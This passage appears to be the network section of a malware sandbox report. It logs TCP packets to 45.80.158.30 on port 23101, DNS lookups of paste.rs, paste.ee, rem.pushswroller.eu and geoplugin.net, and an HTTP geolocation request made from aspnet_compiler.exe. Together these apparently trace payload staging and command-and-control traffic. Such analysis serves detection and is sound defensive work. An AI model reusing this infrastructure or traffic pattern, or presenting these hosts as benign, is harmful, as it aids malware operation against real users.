                                                        Dec 17, 2024 14:31:15.470948935 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.470963955 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.471030951 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.479676008 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.479696989 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.479744911 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.483922958 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.483999968 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.484014988 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.484081984 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.492180109 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.492201090 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.492250919 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.500288010 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.500366926 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.500381947 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.500456095 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.500467062 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.508050919 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.508126020 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.508141994 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.508202076 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.516011953 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.516088963 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.520450115 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.520549059 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.528213024 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.528295040 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.536595106 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.536676884 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.544214964 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.544328928 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.550925016 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.551012993 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.642777920 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.642879009 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.647550106 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.647631884 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.650865078 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.650944948 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.657043934 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.657135010 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.663100004 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.663172007 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.668792963 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.668870926 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.672210932 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.672307014 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.678580999 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.678670883 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.680887938 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.680964947 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.685168982 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.685245991 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.685998917 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:15.690423965 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.690552950 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.695813894 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.695883036 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.698565960 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.698651075 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.703921080 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.704008102 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.708601952 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.708678961 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.713454962 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.713526011 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.716018915 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.716101885 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.721692085 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.721771955 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.726721048 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.726807117 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.731926918 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.732028961 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.734802008 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.734961987 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.740147114 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.740221024 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.745348930 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.745438099 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.764139891 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.764204025 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.766742945 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.766810894 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.772573948 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.772655964 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.805855036 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.840095997 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.840128899 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.840197086 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.840217113 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.840217113 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.840259075 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.840301991 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.840326071 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.840478897 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.849899054 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.849963903 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.850126982 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.850126982 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.850157976 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.862905979 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.862941980 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.862991095 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.863033056 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.863066912 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.873631954 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.873697042 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.873725891 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.873743057 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.873786926 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.885842085 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.885884047 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.885983944 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.886029005 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.893522024 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.893564939 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.893608093 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.893632889 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.893687963 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.900825977 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.900866032 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.900898933 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.900913000 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.900939941 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.908366919 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.908407927 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.908538103 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.908545971 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.908576012 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.948447943 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.027626038 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.027695894 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.027786016 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.027848959 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.027895927 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.027951956 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.033756971 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.033804893 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.033852100 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.033878088 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.033917904 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.033972979 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.039825916 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.039870024 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.039916039 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.039940119 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.039977074 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.040108919 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.045576096 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.045619965 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.045747042 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.045747995 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.045799017 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.048773050 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.051292896 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.051382065 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.051425934 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.051445961 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.051476955 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.051552057 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.057137012 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.057183027 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.057229996 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.057252884 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.057271957 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.057384014 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.063004971 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.063049078 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.063055038 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.063153982 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.063153982 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.063172102 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.063246965 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.069176912 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.069220066 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.069331884 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.069331884 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.069360971 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.069665909 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.099261999 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.138009071 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:16.140362024 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:16.225578070 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.225630045 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.225683928 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.225807905 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.225840092 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.225955963 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.227152109 CET231014979545.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.231553078 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.231595993 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.231709003 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.231709003 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.231728077 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.232614994 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.237705946 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.237747908 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.237792969 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.237807989 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.237838984 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.237967968 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.243228912 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.243273973 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.243354082 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.243369102 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.243406057 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.246752977 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.249250889 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.249294996 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.249372005 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.249385118 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.249469042 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.249469995 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.254867077 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.254909039 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.254966974 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.254981041 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.255017042 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.255287886 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.257903099 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.257957935 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.257991076 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258039951 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258217096 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258249998 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258285046 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258311987 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258377075 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258404970 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258430958 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258459091 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258507967 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258536100 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260297060 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260324955 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260351896 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260382891 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260410070 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260436058 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260488033 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260879040 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.260922909 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.261029959 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.261030912 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.261045933 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.261765003 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.266963005 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.267004967 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.267097950 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.267097950 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.267153025 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.268213034 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.276573896 CET4979523101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:16.417749882 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.417800903 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.417913914 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.417913914 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.417989969 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.419015884 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.424026012 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.424068928 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.424187899 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.424187899 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.424232960 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.424300909 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.429899931 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.429944038 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.430025101 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.430037022 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.430068970 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.430140972 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.431561947 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.431699991 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.431709051 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.431807995 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.431828976 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.432080030 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.436357021 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:19.540996075 CET4979523101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:19.542711020 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:19.542787075 CET4980380192.168.2.6178.237.33.50
                                                        Dec 17, 2024 14:31:19.542887926 CET4983023101192.168.2.645.80.158.30

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 17, 2024 14:30:03.612257004 CET5146153192.168.2.61.1.1.1
                                                        Dec 17, 2024 14:30:04.013391018 CET53514611.1.1.1192.168.2.6
                                                        Dec 17, 2024 14:30:08.856482983 CET5729453192.168.2.61.1.1.1
                                                        Dec 17, 2024 14:30:35.563777924 CET5931753192.168.2.61.1.1.1
                                                        Dec 17, 2024 14:30:35.904155970 CET53593171.1.1.1192.168.2.6
                                                        Dec 17, 2024 14:30:39.101216078 CET5692553192.168.2.61.1.1.1
                                                        Dec 17, 2024 14:30:39.416475058 CET53569251.1.1.1192.168.2.6
                                                        Dec 17, 2024 14:30:41.857989073 CET6004753192.168.2.61.1.1.1
                                                        Dec 17, 2024 14:30:41.998100996 CET53600471.1.1.1192.168.2.6

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 17, 2024 14:30:03.612257004 CET192.168.2.61.1.1.10x553fStandard query (0)paste.rsA (IP address)IN (0x0001)false
                                                        Dec 17, 2024 14:30:08.856482983 CET192.168.2.61.1.1.10x288cStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                        Dec 17, 2024 14:30:35.563777924 CET192.168.2.61.1.1.10xf7dcStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                        Dec 17, 2024 14:30:39.101216078 CET192.168.2.61.1.1.10x5eb1Standard query (0)rem.pushswroller.euA (IP address)IN (0x0001)false
                                                        Dec 17, 2024 14:30:41.857989073 CET192.168.2.61.1.1.10x5f2fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 17, 2024 14:30:04.013391018 CET1.1.1.1192.168.2.60x553fNo error (0)paste.rs45.63.94.214A (IP address)IN (0x0001)false
                                                        Dec 17, 2024 14:30:08.994761944 CET1.1.1.1192.168.2.60x288cNo error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 17, 2024 14:30:35.904155970 CET1.1.1.1192.168.2.60xf7dcNo error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                        Dec 17, 2024 14:30:35.904155970 CET1.1.1.1192.168.2.60xf7dcNo error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                        Dec 17, 2024 14:30:39.416475058 CET1.1.1.1192.168.2.60x5eb1No error (0)rem.pushswroller.eu45.80.158.30A (IP address)IN (0x0001)false
                                                        Dec 17, 2024 14:30:41.998100996 CET1.1.1.1192.168.2.60x5f2fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • paste.rs
                                                        • paste.ee
                                                        • geoplugin.net

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.649803178.237.33.50807924C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 17, 2024 14:30:42.126132965 CET71OUTGET /json.gp HTTP/1.1
                                                        Host: geoplugin.net
                                                        Cache-Control: no-cache
                                                        Dec 17, 2024 14:30:43.372935057 CET1171INHTTP/1.1 200 OK
                                                        date: Tue, 17 Dec 2024 13:30:43 GMT
                                                        server: Apache
                                                        content-length: 963
                                                        content-type: application/json; charset=utf-8
                                                        cache-control: public, max-age=300
                                                        access-control-allow-origin: *
